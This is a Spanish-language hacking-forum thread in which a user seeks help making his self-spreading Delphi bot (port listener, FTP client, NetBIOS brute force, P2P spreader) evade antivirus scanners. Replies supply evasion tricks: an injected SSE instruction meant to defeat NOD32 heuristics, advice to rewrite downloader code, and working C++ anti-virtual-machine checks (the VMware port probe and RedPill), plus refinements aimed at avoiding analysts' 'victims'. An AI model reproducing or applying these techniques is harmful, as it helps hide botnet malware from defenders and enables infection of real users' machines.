Tema destacado: Nueva página de elhacker.net en Google+ 
 Autor
|
Tema: ¿Deteccion 20 % NoVirusThanks? (Leído 2,421 veces)
|
Jaixon Jax
 Desconectado
Mensajes: 855
|
Alguien tiene idea de como evadir esta deteccion sin crypters ni nada de eso XD ...  a-squared 24/02/2010 4.5.0.8 -
Avira AntiVir 7.10.4.139 7.6.0.59 TR/Dldr.Delphi.Gen2
Avast 100224-0 4.8.1368 -
AVG 271.1.1/2707 9.0.0.725 -
BitDefender 25/02/2010 7.0.0.2555 DeepScan:Generic.Malware.G!SIFHYVg.AC2CA91F
ClamAV 24/02/2010 0.95.3 -
Comodo 3468 3.13.579 -
Dr.Web 25/02/2010 5.0 DLOADER.Trojan
Ewido 25/02/2010 - -
F-PROT6 20100224 6.3.3.4884 -
G-Data 19.9309 2.0.7309.847 -
Ikarus T3 24/02/2010 1001074 -
Kaspersky 25/02/2010 9.0.0.736 -
McAfee 24/02/2010 5.1.0.0 -
NOD32 4893 4.0.474 NewHeur_PE virus
Panda 23/02/2010 9.5.2 -
Solo 25/02/2010 8.0 -
TrendMicro 871(687100) 1.1-1001 -
VBA32 25/02/2010 3.12.12.2 -
VirusBuster 12.23.2.0 1.5.5.0 -
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
Karcrack
|
Tienes el codigo de eso? Sera mucho mas sencillo...
Sino haz lo tipico... busca la firma que te detectan y modificala... Hay muchas formas...
|
|
|
|
|
En línea
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
Pues si tengo el code  antes la unica dceteccion era la de avira pero con las modificaciones incrustadas en los dos ultimos meses me reboto esto  lo del doctor web ha de ser una firma, lo de nod32 he leido algo por alli y nod32 virtualiza la ejecucion del programa y el positivo es producto de heuristica, lo de Bit Defender no hay la minima referencia en internet y lo de Avira esa deteccion viene de tiempos memorables pero ya que era la unica nunca me preocupe  . En si es un bot hecho en delphi abre un puerto y utiliza dos clientes, realiza dos conexiones durante la ejecucion, tiene un cliente ftp que es para la subida y bajada de archivos, tiene un emulador No-IP, NetBios BruteForce ,P2P Spreader, ... X Ahora  ¿ Que tendria que hacer ? |
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
Karcrack
|
Para saltarte la heuristica del NOD solo has de añadir esta instruccion de ASM: pminsw xmm0,xmm1 Para lo otro prueba a cambiar por ejemplo el metodo que usas para descargar... si es que usa algo de eso.. sino el DrWeb se ha vuelto loco  |
|
|
|
|
En línea
|
|
|
|
|
[Zero]
|
Si se va el NOD32 probablemente se vaya el Bitdefender también  . Como te dijo Karcrack, revisa el método que usas para descargar, y si no resulta, vete borrando código hasta que no te lo detecten y puedas ver a que se debe. Saludos |
|
|
|
|
En línea
|
“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.” Nietzsche |
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
Para saltarte la heuristica del NOD solo has de añadir esta instruccion de ASM: pminsw xmm0,xmm1 Para lo otro prueba a cambiar por ejemplo el metodo que usas para descargar... si es que usa algo de eso.. sino el DrWeb se ha vuelto loco y eso lo podria colocar en el entry point ? algo asi asm
pminsw xmm0,xmm1
end ;
lo del doctor web tal vez sea el cliente ftp sera revisar el code  ... Gracias..
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
Karcrack
|
Para saltarte la heuristica del NOD solo has de añadir esta instruccion de ASM: pminsw xmm0,xmm1 Para lo otro prueba a cambiar por ejemplo el metodo que usas para descargar... si es que usa algo de eso.. sino el DrWeb se ha vuelto loco y eso lo podria colocar en el entry point ? algo asi asm
pminsw xmm0,xmm1
end ;
lo del doctor web tal vez sea el cliente ftp sera revisar el code ... Gracias.. Si, eso el el EP deberia funcionar perfectamente, si Delphi no te reconoce las instrucciones prueba a meter los OPCODES, sino te tocara hacerlo con Olly..
|
|
|
|
|
En línea
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
 Pues no me funciono el code que coloco Karckrack ...... lo unico que pude lograr fue eliminar el positivo del BitDefender desechando algunas instrucciones que el programa utilizaba de una dll y hacerlas a mano ... he estado subiendo cada una de las versiones tambien intente con desechar todas las apis de esa dll de delphi pero las tres detecciones restante lo que hacen es cambiar de nombre ... exepto la de avira .. Ahora estoy revisando y añadiendo modulo por modulo a un proyecto paralelo a ver cuales son los que estan detectados ... Creo que tendre que hacerme un Crypter ¡¡¡¡ Aunque el 15 % de deteccion no es tan malo ..
|
|
|
|
« Última modificación: 27 Febrero 2010, 05:09 por Jaixxon Jax »
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
[Zero]
|
Dájate de crypters y hazlo fud, tener que usar uno solo crearía problemas, es mejor que te detecte la mitad por firma que que te detecten todos por proactiva  . Saludos |
|
|
|
|
En línea
|
“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.” Nietzsche |
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
Los siguientes codes son el responsable de la deteccion de BitDefender es el unico copy past del proyecto  y es para detectar Maquina Virtual aqui los pongo tal como los encontre en c++ bool Test2()
{
bool rc = true ;
__try
{
__asm
{
push edx
push ecx
push ebx
mov eax, 'VMXh'
mov ebx, 9 // any value but not the MAGIC VALUE mov ebx, 0 / / cualquier valor, pero no el valor mágico
mov ecx, 10 // get VMWare version mov ecx, 10 / / obtener la versión de VMWare
mov edx, 'VX' // port number mov edx, / 'VX' / número de puerto
in eax, dx // read port en eax, dx / / leer el puerto
cmp ebx, 'VMXh' // is it a reply from VMWare? ebx cmp, 'VMXh' / / es una respuesta de VMWare?
setz [rc] // set return value Setz [RC] / / establecer el valor de retorno
pop ebx
pop ecx
pop edx
}
}
catch (...)
{
rc = false ;
}
return rc;
}
bool Test3 ()
{
unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
if(m[5]>0xd0)
return true;
else
return 0;
}
bool __fastcall TService14::DetectarMaquinaVirtual()
{
if(Test3())
return true;
if(Test1())
return true;
if(Test2())
return true;
return false;
}
Lo mas interesante es que al suprimir estas funciones la deteccion de avira cambia ha TR/Downloader.Gen2 inmagino que habra que hacer opcodes de eso pero la verdad ya estan algo añejas esas funciones ......  He leido de hacer tests de hardware para detectar VMWare los controladores utilizan direcciones hardcodeas que son modificadas al utilizar un VMWare pero eso es la teoria si alguien sabe algo mas ... File InfoReport date: 2010-02-28 01:40:36 (GMT 1) File name: cutre.exeFile size: 0 bytes MD5 Hash: SHA1 Hash: Detection rate: 3 on 22 ( 14%) Status: INFECTED Detectionsa-squared - - Avast - - AVG - - Avira AntiVir - TR/Downloader.Gen2BitDefender - - ClamAV - - Comodo - - Dr.Web - DLOADER.TrojanEwido - - F-PROT6 - - G-Data - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 - NewHeur_PE virusPanda - - Solo - - Sophos - - TrendMicro - - VBA32 - - VirusBuster - - Zoner - - Scan report generated by
NoVirusThanks.org Ya voy mejorando jeje ... Agregado en la Madrugada XD Este Code es causante de la deteccion de Avira. AnsiString MiIp::HtmlRead(char Direccion_http[127])
{
HINTERNET Url;
char *Buffer;
HINTERNET apertura;
char User_agent[] = "HTTP Client";
apertura = InternetOpen(User_agent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if(apertura != NULL)
{
Url = InternetOpenUrlA( apertura, Direccion_http, 0, 0, INTERNET_FLAG_RELOAD, 0 );
if(Url != NULL)
{
DWORD BytesRecurso;
if( InternetQueryDataAvailable( Url, &BytesRecurso, 0, 0 ) != false)
{
DWORD BytesLeidos = 0;
Buffer = new char[BytesRecurso+1];
if( InternetReadFile( Url, Buffer, BytesRecurso, &BytesLeidos ) == true)
{
Buffer[BytesRecurso] = '\0';
}
}
else
{
Buffer = new char[16];
strcpy(Buffer,"127.0.0.1");
}
}
}
InternetCloseHandle( Url );
InternetCloseHandle( apertura );
WSACleanup();
return Buffer;
}
Como veran este lo utilizo para descargar el fichero con la ip externe d e la maquina..... pero despues de esto avira cambia la deteccion a HEUR/Crypted debe ser por que toda las cadenas estan encriptadas ? ...... |
|
|
|
« Última modificación: 28 Febrero 2010, 06:40 por Jaixxon Jax »
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
Karcrack
|
Respecto al Test2(): Veo que unicamente utilizas un byte de los registros ebx, ecx, y del registro edx solo un word (2bytes) asi que un codigo equivalente seria: push edx
push ecx
push ebx
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov eax, 'VMXh'
mov bl, 9
mov cl, 10
mov dx, 'VX'
...
Respecto al Test3(), que es el famoso RedPill: http://www.advancevb.com.ar/?p=332
http://www.cs.nps.navy.mil/people/faculty/irvine/publications/2000/VMM-usenix00-0611.pdf
http://invisiblethings.org/papers/redpill.html
http://www.ntsecurity.nu/onmymind/2007/2007-02-27.html
http://blog.assarbad.net/wp-content/uploads/2006/11/redpill_getting_colorless.pdf El codigo que tienes equivale a este en ASM: mov ecx, [esp+4] ;Siendo [ESP+4] el puntero a un Array de 6 bytes
sidt [ecx]
retn
Respecto al codigo que te detecta el Avira: Este va a ser mas dificil de saltar, yo de ti probaría a cambiar tooodas las APIs esas de WinINET por llamar al ActiveX WinINET con CoInitialize... etc... No se si es viable o que... http://msdn.microsoft.com/en-us/library/ms680573(VS.85).aspx |
|
|
|
|
En línea
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
Gracias Karckrack los dos Tests estan fuds Test1 lo hice yo y lo que hace es buscar instalaciones de VMWare en la pc puede ser que vmware no este corriendo en el momento pero prefiero evadir victimas con VMWare instalado en su PC ... Ya por lo menos estoy en el 14 % para deshacerme de las otras tres detecciones tendre que desensamblar hasta los tuetanos el source y son mas de 5000 lineas de code .... Otra cosa intente pasarle UPX al exe me lo comprimio a mas de la mitad el tamaño pero las detecciones se dispararon a 6 por los momentos desisto de comprimir el exe .... Gracias y Saludos .... |
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
Karcrack
|
Gracias Karckrack los dos Tests estan fuds Test1 lo hice yo y lo que hace es buscar instalaciones de VMWare en la pc puede ser que vmware no este corriendo en el momento pero prefiero evadir victimas con VMWare instalado en su PC ... Eso es... una tonteria...  Si te estas ejecutando en un entorno no virtualizado... que problema hay que este instalado la VM? Y ademas, desde dentro de la VM eso no serviria.. asi que ese metodo... no le veo mucho sentido Creo que seria mas inteligente buscar las rutas de los Addons que tienen las VMs.... Esos si que estan instalados en el W$ de la VM, por lo tanto es util...
|
|
|
|
|
En línea
|
|
|
|
Jaixon Jax
Desconectado
Mensajes: 855
|
Gracias Karckrack los dos Tests estan fuds Test1 lo hice yo y lo que hace es buscar instalaciones de VMWare en la pc puede ser que vmware no este corriendo en el momento pero prefiero evadir victimas con VMWare instalado en su PC ... Eso es... una tonteria... Si te estas ejecutando en un entorno no virtualizado... que problema hay que este instalado la VM? Y ademas, desde dentro de la VM eso no serviria.. asi que ese metodo... no le veo mucho sentido Creo que seria mas inteligente buscar las rutas de los Addons que tienen las VMs.... Esos si que estan instalados en el W$ de la VM, por lo tanto es util... Jeje si ya suprimi esa funcion buscare mas info de lo que me recomiendas ...
|
|
|
|
|
En línea
|
Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
|
|
|
|
 |
